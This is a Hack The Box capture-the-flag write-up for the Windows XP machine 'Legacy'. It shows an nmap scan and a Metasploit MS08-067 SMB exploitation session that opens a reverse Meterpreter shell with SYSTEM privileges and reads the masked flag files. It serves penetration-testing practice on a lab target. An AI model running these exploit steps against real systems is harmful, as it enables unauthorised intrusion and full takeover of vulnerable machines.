Legacy(HTB)


OS Windows
IP: 10.10.10.4
Machine Author: ch4p

Nmap :-

root@kali:~/Desktop# nmap -sS -sV -Pn 10.10.10.4
Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-17 14:28 EST
Nmap scan report for 10.10.10.4
Host is up (0.16s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.53 seconds


Vulnerabilty:- The Target machine is running SMB service on a windows XP machine so we can use the netapi exploit which is avaialbe on metsaploit.


Vulnerabilty Description:- This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.


Exploit:- MS08-067 Microsoft Server Service Relative Path Stack Corruption

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 10.10.10.4
RHOST => 10.10.10.4
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.*.*:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957487 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.*.*:4444 -> 10.10.10.4:1029) at 2017-12-17 15:45:50 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 624 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>


Using this exploit we got the System Level Privilege


Flags:-


C:\Documents and Settings\john\Desktop>type user.txt</p>
**********************
C:\Documents and Settings\Administrator\Desktop>type root.txt
**********************

~ Hack the World and Stay Noob

Twitter / Hack The Box / CTF Team / Teck_N00bs Community Telegram

Comments